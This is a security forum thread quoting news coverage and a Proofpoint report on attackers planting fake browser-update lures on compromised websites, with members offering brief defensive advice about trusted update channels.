Watch Out: Attackers Are Hiding Malware in 'Browser Updates'

silversurfer

silversurfer

Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Well-known
Aug 17, 2014
10,176
Content source
https://www.darkreading.com/threat-intelligence/watch-out-attackers-hiding-malware-browser-updates
Updating your browser when prompted is a good practice, just make sure the notification comes from the vendor themselves.

Threat actors are using cybersecurity best practices against you, hiding malware inside of fake browser updates. They do so by seeding legitimate but vulnerable websites with malicious JavaScript. Upon loading, the code presents users with convincing browser update notifications, masking dangerous payloads.

According to a Oct. 17 report from Proofpoint, the trend began with one threat actor, TA569, and it has since been adopted by at least four different threat clusters, in what appears to be a growing and intractable new trend.

"TA569 has been very active for quite some time, and I've seen how difficult it has been for customers to understand and remediate the threat on their own," says Daniel Blackford, senior manager of threat research at Proofpoint. Because it's so effective, he adds, "other threat actors have absolutely piggybacked on it."
Click to expand...
 
  • Like
  • +Reputation
  • Thanks
Reactions: Gandalf_The_Grey, Moonhorse, upnorth and 12 others
silversurfer

silversurfer

Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Well-known
Aug 17, 2014
10,176
wat0114 said:
In Linux the browser is updated from the official repositories through the package manager, and never through the browser itself.
Click to expand...
Probably same advantage for Windows users when installing browsers only from Microsoft Store, major browsers are available there.
 
  • Like
Reactions: Moonhorse, simmerskool, ForgottenSeer 103564 and 3 others
Ink

Ink

Administrator
Verified
Staff Member
Well-known
Jan 8, 2011
22,361

The Current Landscape of Fake Browser Updates​

www.proofpoint.com

Are You Sure Your Browser is Up to Date? The Current Landscape of Fake Browser Updates | Proofpoint US

Key Takeaways
www.proofpoint.com www.proofpoint.com

Key Takeaways
  • Proofpoint is tracking multiple different threat clusters that use similar themes related to fake browser updates.
  • Fake browser updates abuse end user trust with compromised websites and a lure customized to the user's browser to legitimize the update and fool users into clicking.
  • Threat actors do not send emails to share the compromised websites. The threat is only in the browser and can be initiated by a click from a legitimate and expected email, social media site, search engine query, or even just navigating to the compromised site.
  • The different campaigns use similar lures, but different payloads. It is important to identify which campaign and malware cluster the threat belongs to help guide defender response
Click to expand...

The fake browser update lures are effective because threat actors are using an end-user's security training against them. In security awareness training, users are told to only accept updates or click on links from known and trusted sites, or individuals, and to verify sites are legitimate. The fake browser updates abuse this training because they compromise trusted sites and use JavaScript requests to quietly make checks in the background and overwrite the existing, website with a browser update lure. To an end user, it still appears to be the same website they were intending to visit and is now asking them to update their browser.
Click to expand...

Remember that all modern browser update silently in the background.
 
  • Like
Reactions: Gandalf_The_Grey and silversurfer
You must log in or register to reply here.

Similar threads

Gandalf_The_Grey
    • Like
    • Wow
    • +Reputation
Hundreds of U.S. news sites hit in SocGholish supply-chain attack
Replies
0
Views
573
News Archive
Gandalf_The_Grey
Gandalf_The_Grey
Gandalf_The_Grey
    • Like
    • +Reputation
ViperSoftX info-stealing malware now targets password managers
Replies
1
Views
1,214
News Archive
Zero Knowledge
Z
Ink
    • Like
    • Hundred Points
Serious Discussion How Android malware slips onto Google Play Store; a tactic called Versioning
Replies
0
Views
483
General Security Discussions
Ink
Ink

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

Quick Navigation

Forum Rules Warning System Welcome Guide Two-factor Authentication

User Menu

Login

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top